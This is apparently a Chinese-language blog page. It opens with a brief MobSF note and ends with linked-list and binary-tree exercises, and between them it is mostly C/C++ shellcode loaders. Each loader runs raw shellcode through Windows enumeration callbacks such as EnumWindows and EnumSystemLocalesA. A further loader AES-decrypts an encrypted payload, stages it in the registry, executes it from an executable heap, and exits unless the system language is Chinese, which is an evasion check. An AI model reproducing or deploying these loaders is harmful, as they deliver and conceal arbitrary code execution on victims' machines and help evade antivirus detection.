mobsf api调试
mobsf api调试
mobsf
平台需要接入移动端扫描,于是选用了mobsf
查阅mobsf的源码,得知它的静态扫描也是通过使用正则来匹配敏感信息,静态扫描误报还是挺多的
c shellcode callback function
c shellcode callback function
EnumChildWindows.cpp
//#include "stdafx.h"
#include <Windows.h>
#include <stdio.h>
int main()
{
char shellcode[] = "\x31\xdb\x64\x8b\x7b\x30\x8b\x7f"
"\x0c\x8b\x7f\x1c\x8b\x47\x08\x8b"
"\x77\x20\x8b\x3f\x80\x7e\x0c\x33"
"\x75\xf2\x89\xc7\x03\x78\x3c\x8b"
"\x57\x78\x01\xc2\x8b\x7a\x20\x01"
"\xc7\x89\xdd\x8b\x34\xaf\x01\xc6"
"\x45\x81\x3e\x43\x72\x65\x61\x75"
"\xf2\x81\x7e\x08\x6f\x63\x65\x73"
"\x75\xe9\x8b\x7a\x24\x01\xc7\x66"
"\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7"
"\x8b\x7c\xaf\xfc\x01\xc7\x89\xd9"
"\xb1\xff\x53\xe2\xfd\x68\x63\x61"
"\x6c\x63\x89\xe2\x52\x52\x53\x53"
"\x53\x53\x53\x53\x52\x53\xff\xd7";
HANDLE hAlloc = VirtualAlloc(NULL, sizeof(shellcode), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
memcpy(hAlloc, shellcode, sizeof(shellcode));
EnumChildWindows((HWND) NULL,(WNDENUMPROC) hAlloc,NULL);
}
EnumDateFormatsA.cpp
//#include "stdafx.h"
#include <Windows.h>
#include <stdio.h>
int main()
{
char shellcode[] = "\x31\xdb\x64\x8b\x7b\x30\x8b\x7f"
"\x0c\x8b\x7f\x1c\x8b\x47\x08\x8b"
"\x77\x20\x8b\x3f\x80\x7e\x0c\x33"
"\x75\xf2\x89\xc7\x03\x78\x3c\x8b"
"\x57\x78\x01\xc2\x8b\x7a\x20\x01"
"\xc7\x89\xdd\x8b\x34\xaf\x01\xc6"
"\x45\x81\x3e\x43\x72\x65\x61\x75"
"\xf2\x81\x7e\x08\x6f\x63\x65\x73"
"\x75\xe9\x8b\x7a\x24\x01\xc7\x66"
"\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7"
"\x8b\x7c\xaf\xfc\x01\xc7\x89\xd9"
"\xb1\xff\x53\xe2\xfd\x68\x63\x61"
"\x6c\x63\x89\xe2\x52\x52\x53\x53"
"\x53\x53\x53\x53\x52\x53\xff\xd7";
HANDLE hAlloc = VirtualAlloc(NULL, sizeof(shellcode), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
memcpy(hAlloc, shellcode, sizeof(shellcode));
EnumDateFormatsA((DATEFMT_ENUMPROCA)hAlloc , LOCALE_SYSTEM_DEFAULT, (DWORD) 0);
}
EnumDesktopW.cpp
//#include "stdafx.h"
#include <Windows.h>
#include <stdio.h>
#include "Wingdi.h"
int main()
{
char shellcode[] = "\x31\xdb\x64\x8b\x7b\x30\x8b\x7f"
"\x0c\x8b\x7f\x1c\x8b\x47\x08\x8b"
"\x77\x20\x8b\x3f\x80\x7e\x0c\x33"
"\x75\xf2\x89\xc7\x03\x78\x3c\x8b"
"\x57\x78\x01\xc2\x8b\x7a\x20\x01"
"\xc7\x89\xdd\x8b\x34\xaf\x01\xc6"
"\x45\x81\x3e\x43\x72\x65\x61\x75"
"\xf2\x81\x7e\x08\x6f\x63\x65\x73"
"\x75\xe9\x8b\x7a\x24\x01\xc7\x66"
"\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7"
"\x8b\x7c\xaf\xfc\x01\xc7\x89\xd9"
"\xb1\xff\x53\xe2\xfd\x68\x63\x61"
"\x6c\x63\x89\xe2\x52\x52\x53\x53"
"\x53\x53\x53\x53\x52\x53\xff\xd7";
HANDLE hAlloc = VirtualAlloc(NULL, sizeof(shellcode), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
memcpy(hAlloc, shellcode, sizeof(shellcode));
EnumDesktopsW(GetProcessWindowStation(),(DESKTOPENUMPROCW) hAlloc, NULL);
printf("%d", GetLastError());
VirtualFree(hAlloc,0, MEM_RELEASE);
}
EnumDesktopWindows.cpp
//#include "stdafx.h"
#include <Windows.h>
#include <stdio.h>
int main()
{
char shellcode[] = "\x31\xdb\x64\x8b\x7b\x30\x8b\x7f"
"\x0c\x8b\x7f\x1c\x8b\x47\x08\x8b"
"\x77\x20\x8b\x3f\x80\x7e\x0c\x33"
"\x75\xf2\x89\xc7\x03\x78\x3c\x8b"
"\x57\x78\x01\xc2\x8b\x7a\x20\x01"
"\xc7\x89\xdd\x8b\x34\xaf\x01\xc6"
"\x45\x81\x3e\x43\x72\x65\x61\x75"
"\xf2\x81\x7e\x08\x6f\x63\x65\x73"
"\x75\xe9\x8b\x7a\x24\x01\xc7\x66"
"\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7"
"\x8b\x7c\xaf\xfc\x01\xc7\x89\xd9"
"\xb1\xff\x53\xe2\xfd\x68\x63\x61"
"\x6c\x63\x89\xe2\x52\x52\x53\x53"
"\x53\x53\x53\x53\x52\x53\xff\xd7";
HANDLE hAlloc = VirtualAlloc(NULL, sizeof(shellcode), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
memcpy(hAlloc, shellcode, sizeof(shellcode));
EnumDesktopWindows(GetThreadDesktop(GetCurrentThreadId()),
(WNDENUMPROC) hAlloc,
(LPARAM) NULL);
}
EnumSystemCodePagesA.cpp
//#include "stdafx.h"
#include <Windows.h>
#include <stdio.h>
int main()
{
char shellcode[] = "\x31\xdb\x64\x8b\x7b\x30\x8b\x7f"
"\x0c\x8b\x7f\x1c\x8b\x47\x08\x8b"
"\x77\x20\x8b\x3f\x80\x7e\x0c\x33"
"\x75\xf2\x89\xc7\x03\x78\x3c\x8b"
"\x57\x78\x01\xc2\x8b\x7a\x20\x01"
"\xc7\x89\xdd\x8b\x34\xaf\x01\xc6"
"\x45\x81\x3e\x43\x72\x65\x61\x75"
"\xf2\x81\x7e\x08\x6f\x63\x65\x73"
"\x75\xe9\x8b\x7a\x24\x01\xc7\x66"
"\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7"
"\x8b\x7c\xaf\xfc\x01\xc7\x89\xd9"
"\xb1\xff\x53\xe2\xfd\x68\x63\x61"
"\x6c\x63\x89\xe2\x52\x52\x53\x53"
"\x53\x53\x53\x53\x52\x53\xff\xd7";
HANDLE hAlloc = VirtualAlloc(NULL, sizeof(shellcode), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
memcpy(hAlloc, shellcode, sizeof(shellcode));
EnumSystemCodePagesA((CODEPAGE_ENUMPROCA)hAlloc ,0);
}
EnumSystemCodePagesW.cpp
//#include "stdafx.h"
#include <Windows.h>
#include <stdio.h>
using namespace std;
// Create a string with last error message
std::string GetLastErrorStdStr()
{
DWORD error = GetLastError();
if (error)
{
LPVOID lpMsgBuf;
DWORD bufLen = FormatMessage(
FORMAT_MESSAGE_ALLOCATE_BUFFER |
FORMAT_MESSAGE_FROM_SYSTEM |
FORMAT_MESSAGE_IGNORE_INSERTS,
NULL,
error,
MAKELANGID(LANG_NEUTRAL, SUBLANG_DEFAULT),
(LPTSTR)&lpMsgBuf,
0, NULL);
if (bufLen)
{
LPCSTR lpMsgStr = (LPCSTR)lpMsgBuf;
std::string result(lpMsgStr, lpMsgStr + bufLen);
LocalFree(lpMsgBuf);
return result;
}
}
return std::string();
}
int main()
{
char shellcode[] = "\x31\xdb\x64\x8b\x7b\x30\x8b\x7f"
"\x0c\x8b\x7f\x1c\x8b\x47\x08\x8b"
"\x77\x20\x8b\x3f\x80\x7e\x0c\x33"
"\x75\xf2\x89\xc7\x03\x78\x3c\x8b"
"\x57\x78\x01\xc2\x8b\x7a\x20\x01"
"\xc7\x89\xdd\x8b\x34\xaf\x01\xc6"
"\x45\x81\x3e\x43\x72\x65\x61\x75"
"\xf2\x81\x7e\x08\x6f\x63\x65\x73"
"\x75\xe9\x8b\x7a\x24\x01\xc7\x66"
"\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7"
"\x8b\x7c\xaf\xfc\x01\xc7\x89\xd9"
"\xb1\xff\x53\xe2\xfd\x68\x63\x61"
"\x6c\x63\x89\xe2\x52\x52\x53\x53"
"\x53\x53\x53\x53\x52\x53\xff\xd7";
HANDLE hAlloc = VirtualAlloc(NULL, sizeof(shellcode), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
memcpy(hAlloc, shellcode, sizeof(shellcode));
EnumSystemCodePagesW((CODEPAGE_ENUMPROCW)hAlloc, CP_INSTALLED);
printf(GetLastErrorStdStr().c_str());
VirtualFree(hAlloc,0, MEM_RELEASE);
}
EnumSystemGeoID.cpp
//#include "stdafx.h"
#include <Windows.h>
#include <stdio.h>
int main()
{
char shellcode[] = "\x31\xdb\x64\x8b\x7b\x30\x8b\x7f"
"\x0c\x8b\x7f\x1c\x8b\x47\x08\x8b"
"\x77\x20\x8b\x3f\x80\x7e\x0c\x33"
"\x75\xf2\x89\xc7\x03\x78\x3c\x8b"
"\x57\x78\x01\xc2\x8b\x7a\x20\x01"
"\xc7\x89\xdd\x8b\x34\xaf\x01\xc6"
"\x45\x81\x3e\x43\x72\x65\x61\x75"
"\xf2\x81\x7e\x08\x6f\x63\x65\x73"
"\x75\xe9\x8b\x7a\x24\x01\xc7\x66"
"\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7"
"\x8b\x7c\xaf\xfc\x01\xc7\x89\xd9"
"\xb1\xff\x53\xe2\xfd\x68\x63\x61"
"\x6c\x63\x89\xe2\x52\x52\x53\x53"
"\x53\x53\x53\x53\x52\x53\xff\xd7";
HANDLE hAlloc = VirtualAlloc(NULL, sizeof(shellcode), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
memcpy(hAlloc, shellcode, sizeof(shellcode));
EnumSystemGeoID(GEOCLASS_NATION,0,(GEO_ENUMPROC) hAlloc);
}
EnumSystemLanguageGroupsA.cpp
//#include "stdafx.h"
#include <Windows.h>
#include <stdio.h>
int main()
{
char shellcode[] = "\x31\xdb\x64\x8b\x7b\x30\x8b\x7f"
"\x0c\x8b\x7f\x1c\x8b\x47\x08\x8b"
"\x77\x20\x8b\x3f\x80\x7e\x0c\x33"
"\x75\xf2\x89\xc7\x03\x78\x3c\x8b"
"\x57\x78\x01\xc2\x8b\x7a\x20\x01"
"\xc7\x89\xdd\x8b\x34\xaf\x01\xc6"
"\x45\x81\x3e\x43\x72\x65\x61\x75"
"\xf2\x81\x7e\x08\x6f\x63\x65\x73"
"\x75\xe9\x8b\x7a\x24\x01\xc7\x66"
"\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7"
"\x8b\x7c\xaf\xfc\x01\xc7\x89\xd9"
"\xb1\xff\x53\xe2\xfd\x68\x63\x61"
"\x6c\x63\x89\xe2\x52\x52\x53\x53"
"\x53\x53\x53\x53\x52\x53\xff\xd7";
HANDLE hAlloc = VirtualAlloc(NULL, sizeof(shellcode), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
memcpy(hAlloc, shellcode, sizeof(shellcode));
EnumSystemLanguageGroupsA((LANGUAGEGROUP_ENUMPROCA) hAlloc,LGRPID_SUPPORTED,0);
}
EnumSystemLocalesA.cpp
//#include "stdafx.h"
#include <Windows.h>
#include <stdio.h>
int main()
{
char shellcode[] = "\x31\xdb\x64\x8b\x7b\x30\x8b\x7f"
"\x0c\x8b\x7f\x1c\x8b\x47\x08\x8b"
"\x77\x20\x8b\x3f\x80\x7e\x0c\x33"
"\x75\xf2\x89\xc7\x03\x78\x3c\x8b"
"\x57\x78\x01\xc2\x8b\x7a\x20\x01"
"\xc7\x89\xdd\x8b\x34\xaf\x01\xc6"
"\x45\x81\x3e\x43\x72\x65\x61\x75"
"\xf2\x81\x7e\x08\x6f\x63\x65\x73"
"\x75\xe9\x8b\x7a\x24\x01\xc7\x66"
"\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7"
"\x8b\x7c\xaf\xfc\x01\xc7\x89\xd9"
"\xb1\xff\x53\xe2\xfd\x68\x63\x61"
"\x6c\x63\x89\xe2\x52\x52\x53\x53"
"\x53\x53\x53\x53\x52\x53\xff\xd7";
HANDLE hAlloc = VirtualAlloc(NULL, sizeof(shellcode), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
memcpy(hAlloc, shellcode, sizeof(shellcode));
EnumSystemLocalesA((LOCALE_ENUMPROCA)hAlloc ,NULL);
}
EnumThreadWindows.cpp
//#include "stdafx.h"
#include <Windows.h>
#include <stdio.h>
int main()
{
char shellcode[] = "\x31\xdb\x64\x8b\x7b\x30\x8b\x7f"
"\x0c\x8b\x7f\x1c\x8b\x47\x08\x8b"
"\x77\x20\x8b\x3f\x80\x7e\x0c\x33"
"\x75\xf2\x89\xc7\x03\x78\x3c\x8b"
"\x57\x78\x01\xc2\x8b\x7a\x20\x01"
"\xc7\x89\xdd\x8b\x34\xaf\x01\xc6"
"\x45\x81\x3e\x43\x72\x65\x61\x75"
"\xf2\x81\x7e\x08\x6f\x63\x65\x73"
"\x75\xe9\x8b\x7a\x24\x01\xc7\x66"
"\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7"
"\x8b\x7c\xaf\xfc\x01\xc7\x89\xd9"
"\xb1\xff\x53\xe2\xfd\x68\x63\x61"
"\x6c\x63\x89\xe2\x52\x52\x53\x53"
"\x53\x53\x53\x53\x52\x53\xff\xd7";
HANDLE hAlloc = VirtualAlloc(NULL, sizeof(shellcode), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
memcpy(hAlloc, shellcode, sizeof(shellcode));
EnumThreadWindows(0,(WNDENUMPROC) hAlloc,0);
}
EnumUILanguagesA.cpp
//#include "stdafx.h"
#include <Windows.h>
#include <stdio.h>
int main()
{
char shellcode[] = "\x31\xdb\x64\x8b\x7b\x30\x8b\x7f"
"\x0c\x8b\x7f\x1c\x8b\x47\x08\x8b"
"\x77\x20\x8b\x3f\x80\x7e\x0c\x33"
"\x75\xf2\x89\xc7\x03\x78\x3c\x8b"
"\x57\x78\x01\xc2\x8b\x7a\x20\x01"
"\xc7\x89\xdd\x8b\x34\xaf\x01\xc6"
"\x45\x81\x3e\x43\x72\x65\x61\x75"
"\xf2\x81\x7e\x08\x6f\x63\x65\x73"
"\x75\xe9\x8b\x7a\x24\x01\xc7\x66"
"\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7"
"\x8b\x7c\xaf\xfc\x01\xc7\x89\xd9"
"\xb1\xff\x53\xe2\xfd\x68\x63\x61"
"\x6c\x63\x89\xe2\x52\x52\x53\x53"
"\x53\x53\x53\x53\x52\x53\xff\xd7";
HANDLE hAlloc = VirtualAlloc(NULL, sizeof(shellcode), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
memcpy(hAlloc, shellcode, sizeof(shellcode));
EnumUILanguagesA((UILANGUAGE_ENUMPROCA)hAlloc, MUI_LANGUAGE_ID, 0);
}
EnumWindows.cpp
//#include "stdafx.h"
#include <Windows.h>
#include <stdio.h>
static BOOL CALLBACK EnumWindowCallback(HWND hWnd, LPARAM lparam) {
//printf("%S", lparam);
return true;
}
int main()
{
char shellcode[] = "\x31\xdb\x64\x8b\x7b\x30\x8b\x7f"
"\x0c\x8b\x7f\x1c\x8b\x47\x08\x8b"
"\x77\x20\x8b\x3f\x80\x7e\x0c\x33"
"\x75\xf2\x89\xc7\x03\x78\x3c\x8b"
"\x57\x78\x01\xc2\x8b\x7a\x20\x01"
"\xc7\x89\xdd\x8b\x34\xaf\x01\xc6"
"\x45\x81\x3e\x43\x72\x65\x61\x75"
"\xf2\x81\x7e\x08\x6f\x63\x65\x73"
"\x75\xe9\x8b\x7a\x24\x01\xc7\x66"
"\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7"
"\x8b\x7c\xaf\xfc\x01\xc7\x89\xd9"
"\xb1\xff\x53\xe2\xfd\x68\x63\x61"
"\x6c\x63\x89\xe2\x52\x52\x53\x53"
"\x53\x53\x53\x53\x52\x53\xff\xd7";
HANDLE hAlloc = VirtualAlloc(NULL, sizeof(shellcode), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
memcpy(hAlloc, shellcode, sizeof(shellcode));
EnumWindows((WNDENUMPROC)hAlloc, NULL);
}
reg shellcode加载器
#define _CRT_SECURE_NO_DEPRECATE
#include "Base64.h"
#include "AES.h"
#include <Windows.h>
#include <stdio.h>
#include <Winnls.h>
#pragma comment(lib,"Kernel32.lib")
#include <iostream>
using namespace std;
#define BUF_SIZE 4096
HKEY hKey;
HKEY rootKey = HKEY_CURRENT_USER;
DWORD cbData;
static BOOL CALLBACK EnumWindowCallback(HWND hWnd, LPARAM lparam) {
//printf("%S", lparam);
return true;
}
const char g_key[17] = "asdfwetyhjuytrfd";
const char g_iv[17] = "gfdertfghjkuyrtg";//ECB MODE不需要关心chain,可以填空
string DecryptionAES(const string& strSrc) //AES解密
{
string strData = base64_decode(strSrc);
size_t length = strData.length();
//密文
char* szDataIn = new char[length + 1];
memcpy(szDataIn, strData.c_str(), length + 1);
//明文
char* szDataOut = new char[length + 1];
memcpy(szDataOut, strData.c_str(), length + 1);
//进行AES的CBC模式解密
AES aes;
aes.MakeKey(g_key, g_iv, 16, 16);
aes.Decrypt(szDataIn, szDataOut, length, AES::CBC);
//去PKCS7Padding填充
if (0x00 < szDataOut[length - 1] <= 0x16)
{
int tmp = szDataOut[length - 1];
for (int i = length - 1; i >= length - tmp; i--)
{
if (szDataOut[i] != tmp)
{
memset(szDataOut, 0, length);
cout << "decode error" << endl;
break;
}
else
szDataOut[i] = 0;
}
}
string strDest(szDataOut);
delete[] szDataIn;
delete[] szDataOut;
return strDest;
}
int main()
{
// check languge
LANGID test_id = GetSystemDefaultLangID();
if (test_id != 0x0804)
{
exit(0);
}
// 加密后的shellcode
char buf[BUF_SIZE] = "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";
// 解密shellcode
string strbuf = DecryptionAES(buf);
//cout << "解密后shellcode:" << strbuf << endl;
char buff[BUF_SIZE] = { 0 };
for (int i = 0; i < strbuf.length(); i++) {
buff[i] = strbuf[i];
}
// shellcode 处理,两个两个一起,还原成 \x00 的样子
char* p = buff;
unsigned char* shellcode = (unsigned char*)calloc(strlen(buff) / 2, sizeof(unsigned char));
for (size_t i = 0; i < strlen(buff) / 2; i++) {
sscanf(p, "%2hhx", &shellcode[i]);
p += 2;
}
SIZE_T bufSize = strlen(buff) / 2;
printf("Decrypted buffer:\n");
for (int i = 0; i < bufSize; i++) {
printf("\\x%02x", shellcode[i]);
}
LSTATUS a = RegSetValueExA(rootKey, "HelloTest", 0, 3, shellcode, bufSize);
HANDLE HeapHandle = HeapCreate(HEAP_CREATE_ENABLE_EXECUTE, 0, 0);
BYTE* exec = (BYTE*)HeapAlloc(HeapHandle, HEAP_ZERO_MEMORY, 0);
LSTATUS b = RegQueryValueExA(rootKey, "HelloTest", 0, 0, 0, &cbData);
LSTATUS c = RegQueryValueExA(rootKey, "HelloTest", 0, 0, exec, &cbData);
if (c == ERROR_SUCCESS) {
//EnumSystemLocalesA((LOCALE_ENUMPROCA)exec, 0);
// EnumSystemLanguageGroupsA((LANGUAGEGROUP_ENUMPROCA)exec, LGRPID_SUPPORTED, 0);
EnumWindows((WNDENUMPROC)exec, NULL);
CloseHandle(exec);
}
}
c-单链表
//定义节点
typedef struct node {
int data; //节点存放数据
struct node *next; //指针域
} node;
//定义头指针
typedef struct list {
int size; //链表的长度
struct node *next; //指针域
} list;
list *crete_list() {
//用malloc开辟一块list大小的内存,返回一个list的指针
list *l = malloc(sizeof(list));
//判断申请内存是否成功
if (l == NULL) {
printf("mem error");
return 0;
}
//初始化
l->size = 0; //头节点的数据域,用来表示链表的长度
l->next = NULL;
return l;
}
node *crate_node() {
node *n = malloc(sizeof(node));
if (n == NULL) {
printf("mem error");
return 0;
}
n->data = 0;
n->next = NULL;
return n;
}
//头插
int head_add(list *list, int data) {
//新建空节点
node *new_node = crate_node();
new_node->data = data;
new_node->next = list->next;
list->next = new_node;
list->size++;
return list;
}
//尾插
int tail_add(list *list, int data) {
node *new_node = crate_node();
new_node->data = data;
node *last = list->next;
//如果last为NULL就证明是尾节点了,直接插入
if (!last) {
list->next = new_node;
} else {
//当last的next值不是NULL,保存到last指针
while (last->next) {
last = last->next;
}
//新节点插入到last next
last->next = new_node;
}
list->size++;
return list;
}
//插入
//链表的增加结点操作主要分为查找到第i个位置,将该位置的next指针修改为指向我们新插入的结点,而新插入的结点next指针指向我们i+1个位置的结点。其操作方式可以设置一个前驱结点,利用循环找到第i个位置,再进行插入。
list *list_insert(list *list, int data, int pos) {
node *curr = list;
int i;
for (i = 0; i < pos; i++) {
curr = curr->next; //查找第i个位置的前驱结点
}
//新建节点
node *new_node = crate_node();
//赋值节点data
new_node->data = data;
//插入
new_node->next = curr->next;
curr->next = new_node;
/* 链表长度+1 */
list->size++;
return list;
}
//删除节点
list *list_del(list *list, int pos) {
int i;
node *curr = list;
//遍历链表找到要删除的节点的下一个指针
for (i = 0; i < pos; i++) {
curr = curr->next;
}
//临时记录被删除的节点
node *temp = curr->next;
//删除节点
curr->next = curr->next->next;
//释放掉被删除节点的内存
free(temp);
list->size--;
return list;
}
//删除值
list *list_vul_del(list *list, int data) {
node *curr;
node *p = list->next;
while (p->data != data) {
curr = p;
p = p->next;
}
curr->next = p->next;
free(p);
list->size--;
return list;
}
void print_list(list *list) {
//打印链表总长度
printf("len: %d\n", list->size);
int i = 0;
//list->next值就是下一个节点的指针变量,每个节点都会保存着下一个节点的值
node *p = list->next;
while (p) {
printf("第%d个元素的值为:%d\n", ++i, p->data);
p = p->next;
}
}
int main() {
list *l = crete_list();
head_add(l, 1);
head_add(l, 2);
head_add(l, 10);
tail_add(l, 100);
tail_add(l, 111);
list_insert(l, 520, 1);
list_del(l, 2);
list_vul_del(l, 520);
print_list(l);
}
c-二叉树
#include <stdlib.h>
#include <stdio.h>
/* 树的节点 */
typedef struct tree_node {
/* 左孩子指针 */
struct tree_node *left;
/* 右孩子指针 */
struct tree_node *right;
/* 关键字 */
char key;
}tree_node;
/* 创建一个节点 */
tree_node *tree_create_node(char key)
{
tree_node *node = (struct tree_node*)malloc(sizeof(struct tree_node));
if(node==NULL) return NULL;
node->key = key;
node->left = NULL;
node->right = NULL;
return node;
}
/* 创建一棵二叉树 */
tree_node *tree_create()
{
char str;
tree_node *current;
scanf("%c", &str);
// input ABD##E##CF##G##
if('#' == str)
{
current = NULL;
}
else {
current = tree_create_node(str);
current->left = tree_create();
current->right = tree_create();
}
return current;
}
/* 前序遍历 */
void preorder_traverse1(tree_node *node)
{
if(node != NULL) {
printf("%c\t", node->key);
preorder_traverse1(node->left);
preorder_traverse1(node->right);
}
}
/* 中序遍历 */
void inorder_traverse1(tree_node *node)
{
if(node != NULL) {
inorder_traverse1(node->left);
printf("%c\t", node->key);
inorder_traverse1(node->right);
}
}
/* 后序遍历 */
void postorder_traverse1(tree_node *node)
{
if(node != NULL) {
postorder_traverse1(node->left);
postorder_traverse1(node->right);
printf("%c\t", node->key);
}
}
int main() {
/* ABD##E##CF##G## */
tree_node *root = tree_create();
printf("\n前序遍历1:");
preorder_traverse1(root);
printf("\n\n中序遍历1:");
inorder_traverse1(root);
printf("\n\n后序遍历1:");
postorder_traverse1(root);
printf("\n");
return 0;
}